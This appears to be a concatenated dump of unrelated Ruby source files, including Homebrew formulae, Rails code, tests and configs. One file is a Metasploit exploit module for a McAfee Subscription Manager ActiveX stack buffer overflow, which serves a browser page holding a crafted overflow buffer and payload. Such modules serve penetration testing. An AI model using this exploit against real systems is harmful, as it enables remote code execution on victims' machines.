patches/06-initialize-the-symlink-flag.patch
patches/07-increase-size-of-cfactorstr.patch
patches/08-allow-greater-hostver-values.patch
patches/09-cve-2014-8139-crc-overflow.patch
patches/10-cve-2014-8140-test-compr-eb.patch
patches/11-cve-2014-8141-getzip64data.patch
patches/12-cve-2014-9636-test-compr-eb.patch
patches/13-remove-build-date.patch
patches/14-cve-2015-7696.patch
patches/15-cve-2015-7697.patch
patches/16-fix-integer-underflow-csiz-decrypted.patch
patches/17-restore-unix-timestamps-accurately.patch
patches/18-cve-2014-9913-unzip-buffer-overflow.patch
patches/19-cve-2016-9844-zipinfo-buffer-overflow.patch
patches/20-cve-2018-1000035-unzip-buffer-overflow.patch
patches/21-fix-warning-messages-on-big-files.patch
patches/22-cve-2019-13232-fix-bug-in-undefer-input.patch
patches/23-cve-2019-13232-zip-bomb-with-overlapped-entries.patch
patches/24-cve-2019-13232-do-not-raise-alert-for-misplaced-central-directory.patch
]
end
def install
system "make", "-f", "unix/Makefile",
"CC=#{ENV.cc}",
"LOC=-DLARGE_FILE_SUPPORT",
"D_USE_BZ2=-DUSE_BZIP2",
"L_BZ2=-lbz2",
"macosx",
"LFLAGS1=-liconv"
system "make", "prefix=#{prefix}", "MANDIR=#{man1}", "install"
end
test do
(testpath/"test1").write "Hello!"
(testpath/"test2").write "Bonjour!"
(testpath/"test3").write "Hej!"
system "/usr/bin/zip", "test.zip", "test1", "test2", "test3"
%w[test1 test2 test3].each do |f|
rm f
refute_predicate testpath/f, :exist?, "Text files should have been removed!"
end
system bin/"unzip", "test.zip"
%w[test1 test2 test3].each do |f|
assert_predicate testpath/f, :exist?, "Failure unzipping test.zip!"
end
assert_match "Hello!", File.read(testpath/"test1")
assert_match "Bonjour!", File.read(testpath/"test2")
assert_match "Hej!", File.read(testpath/"test3")
end
end
| 38.197802 | 111 | 0.713176 |
28252df18f7faeddf98c2037b3196f23de338f74 | 213 | module Cucumber #:nodoc:
class VERSION #:nodoc:
MAJOR = 0
MINOR = 3
TINY = 98
PATCH = nil # Set to nil for official release
STRING = [MAJOR, MINOR, TINY, PATCH].compact.join('.')
end
end
| 19.363636 | 58 | 0.610329 |
b9fc03922c7dec7f42d704fadb6b68bca16b5495 | 700 | # frozen_string_literal: true
module Screenshots
class CreateMessageThreadsService
prepend BasicService
option :message_threads
def call
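      # Reduce each raw thread payload to the fields we persist, then attach every thread
      # to its player (matched by the sender's online ID); unknown senders are skipped.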
prepared_threads = @message_threads.map do |thread|
{
id: thread['threadId'],
date: thread['threadModifiedDate'],
message_thread_name: thread['latestMessageEventDetail']['sender']['onlineId']
}
end
prepared_threads.each do |thread|
player = Player.find(message_thread_name: thread[:message_thread_name])
player&.add_message_thread(
MessageThread.new(message_thread_id: thread[:id], last_modified_date: thread[:date])
)
end
end
end
end
| 25.925926 | 94 | 0.665714 |
e27d579c75bad329d00880233ed09c837f47cb80 | 712 | require_dependency "conference_plugin_constraint"
ConferencePlugin::Engine.routes.draw do
get "/" => "conference_plugin#index", constraints: ConferencePluginConstraint.new
get "/schedule" => "conference_plugin#schedule", constraints: ConferencePluginConstraint.new
get "/show" => "conference_plugin#show", constraints: ConferencePluginConstraint.new
post "/schedule" => "conference_plugin#create", constraints: ConferencePluginConstraint.new
delete "/clear" => "conference_plugin#clear", constraints: ConferencePluginConstraint.new
get "/actions" => "actions#index", constraints: ConferencePluginConstraint.new
get "/actions/:id" => "actions#show", constraints: ConferencePluginConstraint.new
end
| 59.333333 | 94 | 0.793539 |
f81e53bbee860429b9d913c2a3ce35438e07c197 | 10,452 | class Localstack < Formula
include Language::Python::Virtualenv
desc "Fully functional local AWS cloud stack"
homepage "https://github.com/localstack/localstack"
url "https://files.pythonhosted.org/packages/32/4b/104718327cbfa9362d52c96af98ab32d59ce9be7d1bca42ee913d5ba7cb2/localstack-0.13.3.6.tar.gz"
sha256 "b52c29ae28a3138ad5ee626a30e7980424dbfa61247561af322e820dbd4c7477"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "ad4172dc190db0b7793a466b7330dc16d7025690178519862f6a4d459a5758e1"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "49268f21ce10a3227b07d8ac460ece38c65de4734ee11b41edc51db85f418446"
sha256 cellar: :any_skip_relocation, monterey: "e7b38f3b30dba4d5f10adb96a21e8f2c5ab9278199a4c8708c27d5103b8c7b50"
sha256 cellar: :any_skip_relocation, big_sur: "047f7fc4dc8d9e2c089b7dfbd969120280d3de748f5ba52c941029515c65a421"
sha256 cellar: :any_skip_relocation, catalina: "c48c435c68573814de60b4d1db5144c2d11f4dc64e484db8cc1273d44cf86e21"
sha256 cellar: :any_skip_relocation, x86_64_linux: "c7beb1b367c6f916f0814b0c4578a29e6879e3d511308950926a8cdd12c3c9f8"
end
depends_on "docker" => :test
depends_on "python-tabulate"
depends_on "[email protected]"
depends_on "six"
on_linux do
depends_on "rust" => :build
end
resource "boto3" do
url "https://files.pythonhosted.org/packages/f6/b0/e42a79e8dc51ff9d9817c12d911893049cfddefbe3e2c062401306102fb9/boto3-1.20.46.tar.gz"
sha256 "d7effba509d7298ef49316ba2da7a2ea115f2a7ff691f875f6354666663cf386"
end
resource "botocore" do
url "https://files.pythonhosted.org/packages/97/b9/f55bf7f44377c1093f16f789979b39d9bed51ad1f2069d17d1ca55d2d4c2/botocore-1.23.46.tar.gz"
sha256 "38dd4564839f531725b667db360ba7df2125ceb3752b0ba12759c3e918015b95"
end
resource "cachetools" do
url "https://files.pythonhosted.org/packages/ae/37/7fd45996b19200e0cb2027a0b6bef4636951c4ea111bfad36c71287247f6/cachetools-3.1.1.tar.gz"
sha256 "8ea2d3ce97850f31e4a08b0e2b5e6c34997d7216a9d2c98e0f3978630d4da69a"
end
resource "certifi" do
url "https://files.pythonhosted.org/packages/6c/ae/d26450834f0acc9e3d1f74508da6df1551ceab6c2ce0766a593362d6d57f/certifi-2021.10.8.tar.gz"
sha256 "78884e7c1d4b00ce3cea67b44566851c4343c120abd683433ce934a68ea58872"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/ee/2d/9cdc2b527e127b4c9db64b86647d567985940ac3698eeabc7ffaccb4ea61/chardet-4.0.0.tar.gz"
sha256 "0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa"
end
resource "click" do
url "https://files.pythonhosted.org/packages/f4/09/ad003f1e3428017d1c3da4ccc9547591703ffea548626f47ec74509c5824/click-8.0.3.tar.gz"
sha256 "410e932b050f5eed773c4cda94de75971c89cdb3155a72a0831139a79e5ecb5b"
end
resource "colorama" do
url "https://files.pythonhosted.org/packages/1f/bb/5d3246097ab77fa083a61bd8d3d527b7ae063c7d8e8671b1cf8c4ec10cbe/colorama-0.4.4.tar.gz"
sha256 "5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"
end
resource "commonmark" do
url "https://files.pythonhosted.org/packages/60/48/a60f593447e8f0894ebb7f6e6c1f25dafc5e89c5879fdc9360ae93ff83f0/commonmark-0.9.1.tar.gz"
sha256 "452f9dc859be7f06631ddcb328b6919c67984aca654e5fefb3914d54691aed60"
end
resource "deepdiff" do
url "https://files.pythonhosted.org/packages/44/46/94a28a8a12889f61ab5a63f68665123d1b671b6eaf861d3ad3ed65614bf1/deepdiff-5.7.0.tar.gz"
sha256 "838766484e323dcd9dec6955926a893a83767dc3f3f94542773e6aa096efe5d4"
end
resource "dill" do
url "https://files.pythonhosted.org/packages/e2/96/518a8ea959a734b70d2e95fef98bcbfdc7adad1c1e5f5dd9148c835205a5/dill-0.3.2.zip"
sha256 "6e12da0d8e49c220e8d6e97ee8882002e624f1160289ce85ec2cc0a5246b3a2e"
end
resource "dnslib" do
url "https://files.pythonhosted.org/packages/e1/96/5889c7fc3b55e727deae20d6a3157423f1355d3dac010c1f1c53dca017bd/dnslib-0.9.19.tar.gz"
sha256 "a6e36ca96c289e2cb4ac6aa05c037cbef318401ba8ff04a8676892ca79749c77"
end
resource "dnspython" do
url "https://files.pythonhosted.org/packages/84/f4/84eca79c279640671b8b7086ef1b97268c2b7ba17f7cfe0a19b466a6f95c/dnspython-2.2.0.tar.gz"
sha256 "e79351e032d0b606b98d38a4b0e6e2275b31a5b85c873e587cc11b73aca026d6"
end
resource "docker" do
url "https://files.pythonhosted.org/packages/fa/a2/e46d7c1b51394a09271a3b07c3a68deb3a669429beafd444d9553ed52868/docker-5.0.0.tar.gz"
sha256 "3e8bc47534e0ca9331d72c32f2881bb13b93ded0bcdeab3c833fb7cf61c0a9a5"
end
resource "dulwich" do
url "https://files.pythonhosted.org/packages/77/42/8a7669dbea5086ed2ee759d75414764a8256070d3c9adcf0e2067ebd9891/dulwich-0.20.32.tar.gz"
sha256 "dc5498b072bdc12c1effef4b6202cd2a4542bb1c6dbb4ddcfc8c6d53e08b488c"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/ea/b7/e0e3c1c467636186c39925827be42f16fee389dc404ac29e930e9136be70/idna-2.10.tar.gz"
sha256 "b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"
end
resource "jmespath" do
url "https://files.pythonhosted.org/packages/3c/56/3f325b1eef9791759784aa5046a8f6a1aff8f7c898a2e34506771d3b99d8/jmespath-0.10.0.tar.gz"
sha256 "b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9"
end
resource "localstack-client" do
url "https://files.pythonhosted.org/packages/4f/b4/92dbff5938fd135909bb1cf0b4c27c5a1b3221784dc6087c1773942fcbcd/localstack-client-1.31.tar.gz"
sha256 "7030dae0d778feef0a790800ba3d50af81d49e410e97df7ddd6ff442e05825a7"
end
resource "localstack-ext" do
url "https://files.pythonhosted.org/packages/e9/00/004decb15e3ded28a4f6c1894d9a576380b43699a04e2100a8ec843817e0/localstack-ext-0.13.3.12.tar.gz"
sha256 "ebf6bcab299a858768acd1698a63b618fb7bf99242f9261389f9cc888a64058c"
end
resource "localstack-plugin-loader" do
url "https://files.pythonhosted.org/packages/2e/82/7e78c8056df07bf05196ee40b4244399f7a66ee5c1fe7ac1c837bf30755b/localstack-plugin-loader-1.1.1.tar.gz"
sha256 "eb829c47332caf2ff1062a2038077e0a5e93c30bb2c61cf2651b07ccadd77448"
end
resource "ordered-set" do
url "https://files.pythonhosted.org/packages/f5/ab/8252360bfe965bba31ec05112b3067bd129ce4800d89e0b85613bc6044f6/ordered-set-4.0.2.tar.gz"
sha256 "ba93b2df055bca202116ec44b9bead3df33ea63a7d5827ff8e16738b97f33a95"
end
resource "pbr" do
url "https://files.pythonhosted.org/packages/f5/0c/3fa7b1f9006e4d454a49b48eac995167cf8617e19375c6963a6b048af0d0/pbr-5.8.0.tar.gz"
sha256 "672d8ebee84921862110f23fcec2acea191ef58543d34dfe9ef3d9f13c31cddf"
end
resource "psutil" do
url "https://files.pythonhosted.org/packages/47/b6/ea8a7728f096a597f0032564e8013b705aa992a0990becd773dcc4d7b4a7/psutil-5.9.0.tar.gz"
sha256 "869842dbd66bb80c3217158e629d6fceaecc3a3166d3d1faee515b05dd26ca25"
end
resource "pyaes" do
url "https://files.pythonhosted.org/packages/44/66/2c17bae31c906613795711fc78045c285048168919ace2220daa372c7d72/pyaes-1.6.1.tar.gz"
sha256 "02c1b1405c38d3c370b085fb952dd8bea3fadcee6411ad99f312cc129c536d8f"
end
resource "Pygments" do
url "https://files.pythonhosted.org/packages/94/9c/cb656d06950268155f46d4f6ce25d7ffc51a0da47eadf1b164bbf23b718b/Pygments-2.11.2.tar.gz"
sha256 "4e426f72023d88d03b2fa258de560726ce890ff3b630f88c21cbb8b2503b8c6a"
end
resource "python-dateutil" do
url "https://files.pythonhosted.org/packages/4c/c4/13b4776ea2d76c115c1d1b84579f3764ee6d57204f6be27119f13a61d0a9/python-dateutil-2.8.2.tar.gz"
sha256 "0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"
end
resource "python-dotenv" do
url "https://files.pythonhosted.org/packages/49/62/4f25667e10561303a34cb89e3187c35985c0889b99f6f1468aaf17fbb03e/python-dotenv-0.19.2.tar.gz"
sha256 "a5de49a31e953b45ff2d2fd434bbc2670e8db5273606c1e737cc6b93eff3655f"
end
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/36/2b/61d51a2c4f25ef062ae3f74576b01638bebad5e045f747ff12643df63844/PyYAML-6.0.tar.gz"
sha256 "68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/6b/47/c14abc08432ab22dc18b9892252efaf005ab44066de871e72a38d6af464b/requests-2.25.1.tar.gz"
sha256 "27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804"
end
resource "rich" do
url "https://files.pythonhosted.org/packages/81/d2/64751634e1af18e61454e9946c8c792ab3866c2b309615844fc435036715/rich-11.1.0.tar.gz"
sha256 "43e03d8eec12e21beaecc22c828a41c4247356414a12d5879834863d4ad53816"
end
resource "s3transfer" do
url "https://files.pythonhosted.org/packages/88/ef/4d1b3f52ae20a7e72151fde5c9f254cd83f8a49047351f34006e517e1655/s3transfer-0.5.0.tar.gz"
sha256 "50ed823e1dc5868ad40c8dc92072f757aa0e653a192845c94a3b676f4a62da4c"
end
resource "semver" do
url "https://files.pythonhosted.org/packages/31/a9/b61190916030ee9af83de342e101f192bbb436c59be20a4cb0cdb7256ece/semver-2.13.0.tar.gz"
sha256 "fa0fe2722ee1c3f57eac478820c3a5ae2f624af8264cbdf9000c980ff7f75e3f"
end
resource "stevedore" do
url "https://files.pythonhosted.org/packages/67/73/cd693fde78c3b2397d49ad2c6cdb082eb0b6a606188876d61f53bae16293/stevedore-3.5.0.tar.gz"
sha256 "f40253887d8712eaa2bb0ea3830374416736dc8ec0e22f5a65092c1174c44335"
end
resource "tailer" do
url "https://files.pythonhosted.org/packages/dd/05/01de24d6393d6da0c27857c76b0f9ae97b42cd6102bbdf76cce95e031295/tailer-0.4.1.tar.gz"
sha256 "78d60f23a1b8a2d32f400b3c8c06b01142ac7841b75d8a1efcb33515877ba531"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/b0/b1/7bbf5181f8e3258efae31702f5eab87d8a74a72a0aa78bc8c08c1466e243/urllib3-1.26.8.tar.gz"
sha256 "0e7c33d9a63e7ddfcb86780aac87befc2fbddf46c58dbb487e0855f7ceec283c"
end
resource "websocket-client" do
url "https://files.pythonhosted.org/packages/b6/fa/72e77d094563208174abbbaa73c32f28c43a31193b843bddf233c7c87644/websocket-client-1.2.3.tar.gz"
sha256 "1315816c0acc508997eb3ae03b9d3ff619c9d12d544c9a9b553704b1cc4f6af5"
end
def install
virtualenv_install_with_resources
end
test do
ENV["DOCKER_HOST"] = "unix://" + (testpath/"invalid.sock")
assert_match version.to_s, shell_output("#{bin}/localstack --version")
output = shell_output("#{bin}/localstack start --docker", 1)
assert_match "starting LocalStack in Docker mode", output
end
end
| 48.165899 | 154 | 0.824244 |
b9c4f9199e5a71f33c4f86f3cb22cf12e6c62905 | 2,553 | # frozen_string_literal: true
require 'test_helper'
# Test that notifications can be viewed and marked as read.
class NotificationsControllerTest < ActionController::TestCase
setup do
@regular_user = users(:valid)
end
test 'should get index' do
login(@regular_user)
get :index
assert_response :success
assert_not_nil assigns(:notifications)
end
test 'should get all read index' do
login(@regular_user)
get :index, params: { all: '1' }
assert_response :success
assert_not_nil assigns(:notifications)
end
test 'should show comment notification' do
login(@regular_user)
get :show, params: { id: notifications(:comment) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications(:comment).comment.sticky
end
test 'should show task completed notification' do
login(@regular_user)
get :show, params: { id: notifications(:task) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications(:task).sticky
end
test 'should show blank notification and redirect' do
login(@regular_user)
get :show, params: { id: notifications(:blank) }
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_redirected_to notifications_path
end
test 'should not show notification without valid id' do
login(@regular_user)
get :show, params: { id: -1 }
assert_nil assigns(:notification)
assert_redirected_to notifications_path
end
test 'should update notification' do
login(users(:valid))
patch :update, params: {
id: notifications(:comment), notification: { read: true }
}, format: 'js'
assert_not_nil assigns(:notification)
assert_equal true, assigns(:notification).read
assert_template 'show'
assert_response :success
end
test 'should mark all as read' do
login(@regular_user)
patch :mark_all_as_read, params: {
project_id: projects(:one)
}, format: 'js'
assert_equal 0, users(:valid).notifications.where(project_id: projects(:one), read: false).count
assert_template 'mark_all_as_read'
assert_response :success
end
test 'should not mark all as read without project' do
login(@regular_user)
assert_difference('Notification.where(read: false).count', 0) do
patch :mark_all_as_read, format: 'js'
end
assert_template 'mark_all_as_read'
assert_response :success
end
end
| 29.686047 | 100 | 0.720721 |
080fab9eb53be95c4a3c60d8665c1578c1ab8386 | 908 | require 'compass/import-once/activate'
# Require any additional compass plugins here.
# Set this to the root of your project when deployed:
http_path = "/"
css_dir = "./style/css"
sass_dir = "./style/sass"
images_dir = "images"
javascripts_dir = "javascripts"
# You can select your preferred output style here (can be overridden via the command line):
# output_style = :expanded or :nested or :compact or :compressed
# To enable relative paths to assets via compass helper functions. Uncomment:
# relative_assets = true
# To disable debugging comments that display the original location of your selectors. Uncomment:
# line_comments = false
# If you prefer the indented syntax, you might want to regenerate this
# project again passing --syntax sass, or you can uncomment this:
# preferred_syntax = :sass
# and then run:
# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass
| 34.923077 | 96 | 0.752203 |
3912f3fca6109324cfcc7586ced4dc757fbd0953 | 722 | # frozen_string_literal: true
class RunClaimReviewParser
include Sidekiq::Worker
  def perform(service, cursor_back_to_date = nil, overwrite_existing_claims = false, send_notifications = true)
cursor_back_to_date = Time.parse(cursor_back_to_date) unless cursor_back_to_date.nil?
ClaimReviewParser.record_service_heartbeat(service)
ClaimReviewParser.run(service, cursor_back_to_date, overwrite_existing_claims, send_notifications)
RunClaimReviewParser.perform_in(Settings.task_interevent_time, service)
end
def self.requeue(service)
if $REDIS_CLIENT.get(ClaimReview.service_heartbeat_key(service)).nil?
RunClaimReviewParser.perform_async(service)
return true
end
false
end
end
| 36.1 | 107 | 0.810249 |
018bb98a8166d0e9a1cf0edc156bea85b1707a09 | 4,325 | # frozen_string_literal: true
require "spec_helper"
require "fakeweb"
require "openssl"
require "jwt"
CERTS_URI = "https://www.googleapis.com/robot/v1/metadata/x509/[email protected]"
RSpec.describe FirebaseIDToken::Validator do
describe "#check" do
before(:all) do
crypto = generate_certificate
@key = crypto[:key]
@cert = crypto[:cert]
end
let(:project_id) { "my-firebase-project-id" }
let(:aud) { project_id }
let(:iss) { "https://securetoken.google.com/#{project_id}" }
let(:exp) { Time.now + 10 }
let(:payload) { {
exp: exp.to_i,
iss: iss,
aud: aud,
user_id: "12345",
email: "[email protected]",
provider_id: "google.com",
verified: true
}}
let(:token) { JWT.encode(payload, @key, "RS256") }
context "with old_skool certs" do
let(:validator) { FirebaseIDToken::Validator.new aud: project_id }
context "when unable to fetch Google certs" do
before do
FakeWeb::register_uri :get, CERTS_URI,
status: ["404", "Not found"], body: "Ouch!"
end
it "raises an error" do
expect {
validator.check("whatever")
}.to raise_error(FirebaseIDToken::CertificateError)
end
end
context "when able to fetch old_skool certs" do
before(:all) do
crypto = generate_certificate
@key2 = crypto[:key]
@cert2 = crypto[:cert]
@certs_body = JSON.dump({
"123" => @cert.to_pem,
"321" => @cert2.to_pem
})
end
before do
FakeWeb::register_uri :get, CERTS_URI,
status: ["200", "Success"], body: @certs_body
end
it "successfully validates a good token" do
result = validator.check(token)
expect(result).to_not be_nil
expect(result["aud"]).to eq aud
end
it "fails to validate a mangled token" do
bad_token = token.gsub("x", "y")
expect {
validator.check(bad_token)
}.to raise_error(FirebaseIDToken::SignatureError)
end
it "fails to validate a good token with wrong aud field" do
validator = FirebaseIDToken::Validator.new(aud: "other-project-id")
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::AudienceMismatchError)
end
context "when token is expired" do
let(:exp) { Time.now - 10 }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::ExpiredTokenError)
end
end
context "with an invalid issuer" do
let(:iss) { "https://accounts.fake.com" }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::InvalidIssuerError)
end
end
context "when certificates are not expired" do
before { validator.instance_variable_set(:@certs_last_refresh, Time.now) }
it "fails to validate a good token" do
expect {
validator.check(token)
}.to raise_error(FirebaseIDToken::SignatureError)
end
end
context "when certificates are expired" do
let(:validator) { FirebaseIDToken::Validator.new(aud: project_id, expiry: 60) }
before { validator.instance_variable_set(:@certs_last_refresh, Time.now - 120) }
          it "successfully validates a good token" do
result = validator.check(token)
expect(result).to_not be_nil
expect(result["aud"]).to eq aud
end
end
end
end
end
def generate_certificate
key = OpenSSL::PKey::RSA.new(2048)
public_key = key.public_key
cert_subject = "/C=BE/O=Test/OU=Test/CN=Test"
cert = OpenSSL::X509::Certificate.new
cert.subject = cert.issuer = OpenSSL::X509::Name.parse(cert_subject)
cert.not_before = Time.now
cert.not_after = Time.now + 365 * 24 * 60 * 60
cert.public_key = public_key
cert.serial = 0x0
cert.version = 2
cert.sign key, OpenSSL::Digest::SHA1.new
{ key: key, cert: cert }
end
end
| 28.833333 | 102 | 0.587746 |
3869cdcc4823ba67ed9e36f7f511c9f224cc18b6 | 2,870 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_03_01
module Models
#
# Result of the request to list VirtualWANs. It contains a list of
# VirtualWANs and a URL nextLink to get the next set of results.
#
class ListVirtualWANsResult
include MsRestAzure
include MsRest::JSONable
# @return [Array<VirtualWAN>] List of VirtualWANs.
attr_accessor :value
# @return [String] URL to get the next set of operation list results if
# there are any.
attr_accessor :next_link
      # @return [Proc] with next page method call.
attr_accessor :next_method
#
# Gets the rest of the items for the request, enabling auto-pagination.
#
# @return [Array<VirtualWAN>] operation results.
#
def get_all_items
items = @value
page = self
while page.next_link != nil && !page.next_link.strip.empty? do
page = page.get_next_page
items.concat(page.value)
end
items
end
#
# Gets the next page of results.
#
# @return [ListVirtualWANsResult] with next page content.
#
def get_next_page
response = @next_method.call(@next_link).value! unless @next_method.nil?
unless response.nil?
@next_link = response.body.next_link
@value = response.body.value
self
end
end
#
# Mapper for ListVirtualWANsResult class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListVirtualWANsResult',
type: {
name: 'Composite',
class_name: 'ListVirtualWANsResult',
model_properties: {
value: {
client_side_validation: true,
required: false,
serialized_name: 'value',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'VirtualWANElementType',
type: {
name: 'Composite',
class_name: 'VirtualWAN'
}
}
}
},
next_link: {
client_side_validation: true,
required: false,
serialized_name: 'nextLink',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 28.415842 | 80 | 0.529965 |
03a0a0d345917c5cbee384821ab384aeb30dce83 | 46 | datadog_monitor 'potato' do
action :add
end
| 11.5 | 27 | 0.76087 |
26bc6c265ebf834cfcff6c5f838013eafea9606e | 275 | module Innsights
  # Hooks the gem into the Rails boot process
  # Loads the rake tasks located in lib/tasks
class Railtie < Rails::Railtie
rake_tasks do
Dir[File.join(File.dirname(__FILE__),'../tasks/*.rake')].each { |f| load f }
end
end
end | 30.555556 | 82 | 0.683636 |
f7b28c1be2c78cf49c7bbf3a3d24e4260800d09b | 3,174 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'McAfee Subscription Manager Stack Buffer Overflow',
'Description' => %q{
This module exploits a flaw in the McAfee Subscription Manager ActiveX control.
Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by
passing a large string to one of the COM-exposed routines, such as IsAppExpired.
This vulnerability was discovered by Karl Lynn of eEye.
},
'License' => MSF_LICENSE,
'Author' =>
[
'skape',
],
'References' =>
[
[ 'CVE', '2006-3961'],
[ 'OSVDB', '27698'],
[ 'BID', '19265'],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html'],
],
'Payload' =>
{
'Space' => 1014,
'MaxNops' => 0,
'BadChars' => "\x00\x09\x0a\x0d'\\" + Rex::Text::UpperAlpha + Rex::Text::HighAscii,
'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe,
'EncoderOptions' =>
{
'BufferOffset' => 0x8
}
},
'Targets' =>
[
# Target 0: Automatic
[
'Windows XP SP0/SP1',
{
'Platform' => 'win',
'Rets' =>
[
0x7605122f, # XP SP0/SP1 shell32.dll: jmp esp
#0x773f346a # XP SP2 comctl32.dll: jmp esp
]
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 01 2006'))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Pick the right target
case request['User-Agent']
when /Windows NT 5.1/
ret = target['Rets'][0]
else
print_error("Unsupported target: #{request['User-Agent']}")
cli.send_response(create_response(404, 'File not found'))
return
end
# Build out our overflow buffer
buf =
rand_text(2972, payload_badchars) +
[ ret ].pack('V') +
"\x60" + # pusha
"\x6a" + rand_char + # push byte 0x1
"\x6a" + rand_char + # push byte 0x1
"\x6a" + rand_char + # push byte 0x1
"\x61" + # popa
p.encoded
# Generate random variable names
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
# Build out the message
content =
"<html>" +
"<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='#{vname}'></object>" +
"<script language='javascript'>\n" +
"var #{vname} = document.getElementById('#{vname}');\n" +
"var #{strname} = new String('#{buf}');\n" +
"#{vname}.IsAppExpired(#{strname}, #{strname}, #{strname});\n" +
"</script>" +
"</html>"
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
| 27.128205 | 94 | 0.597984 |
1cafee194aa299608396c87b1758031d5c9d2c35 | 2,067 | class Order < ApplicationRecord
belongs_to :organization
belongs_to :organization_unscoped, -> { unscope(:where) }, class_name: "Organization", foreign_key: :organization_id
belongs_to :user
has_many :order_details, autosave: true
has_many :items, through: :order_details
has_many :shipments
include OrderStatus
def self.by_status_includes_extras(statuses, include_tables = [:organization, :order_details, :shipments])
statuses = [statuses].flatten.map { |s| Order.statuses[s] }
includes(*include_tables).where(status: statuses)
end
def unscoped_organization
@unscoped_organization ||= Organization.unscoped { organization }
end
def add_shipments(params)
params[:order][:shipments][:tracking_number].each_with_index do |tracking_number, index|
shipping_carrier = params[:order][:shipments][:shipping_carrier][index]
shipments.build date: Time.zone.now, tracking_number: tracking_number, shipping_carrier: shipping_carrier.to_i
end
end
def formatted_order_date
order_date.strftime("%-m/%-d/%Y") if order_date.present?
end
def submitted?
!select_items? && !select_ship_to? && !confirm_order?
end
def open?
!(closed? || rejected? || canceled?)
end
def order_uneditable?
filled? || shipped? || received? || closed? || rejected? || canceled?
end
def ship_to_addresses
organization.addresses.map(&:address)
end
def ship_to_names
[user.name.to_s, "#{organization.name} c/o #{user.name}"]
end
def organization_ship_to_names
organization.users.map do |user|
[user.name.to_s, "#{organization.name} c/o #{user.name}"]
end.flatten
end
def to_json
{
id: id,
status: status,
order_details: order_details.sort_by(&:id).map(&:to_json),
in_requested_status: in_requested_status?
}.to_json
end
def self.to_json
includes(:order_details).order(:id).all.map(&:to_json).to_json
end
def value
order_details.map(&:total_value).sum
end
def item_count
order_details.map(&:quantity).sum
end
end
| 26.5 | 118 | 0.708757 |
bbd88e4293514cec6bfd81107b7256825282991d | 1,313 | STDLIB_FILES = %w[
English.rb
abbrev.rb
base64.rb
benchmark.rb
cgi
cgi.rb
cmath.rb
csv.rb
date
date.rb
debug.rb
delegate.rb
drb
drb.rb
e2mmap.rb
erb.rb
fileutils.rb
find.rb
forwardable.rb
getoptlong.rb
ipaddr.rb
irb
irb.rb
logger.rb
mathn.rb
matrix
matrix.rb
monitor.rb
mutex_m.rb
net
observer.rb
open-uri.rb
open3.rb
optionparser.rb
optparse
optparse.rb
ostruct.rb
pp.rb
prettyprint.rb
prime.rb
profile.rb
profiler.rb
pstore.rb
racc
rbconfig
resolv-replace.rb
resolv.rb
rexml
rinda
rss
rss.rb
scanf.rb
set.rb
shell
shell.rb
shellwords.rb
singleton.rb
sync.rb
thwait.rb
time.rb
tracer.rb
tsort.rb
un.rb
unicode_normalize
unicode_normalize.rb
uri
uri.rb
webrick
webrick.rb
xmlrpc
xmlrpc.rb
yaml
yaml.rb
]
EXT_FILES = {
'ext/bigdecimal/lib/bigdecimal' => 'bigdecimal',
'ext/digest/lib/digest.rb' => 'digest.rb',
'ext/digest/sha2/lib/sha2.rb' => 'digest/sha2.rb',
'ext/nkf/lib/kconv.rb' => 'kconv.rb',
'ext/pathname/lib/pathname.rb' => 'pathname.rb',
'ext/pty/lib/expect.rb' => 'expect.rb',
'ext/socket/lib/socket.rb' => 'socket.rb',
'ext/win32/lib/win32' => 'win32',
'ext/fiddle/lib/fiddle.rb' => 'fiddle.rb',
'ext/fiddle/lib/fiddle' => 'fiddle'
}
| 14.752809 | 52 | 0.651942 |
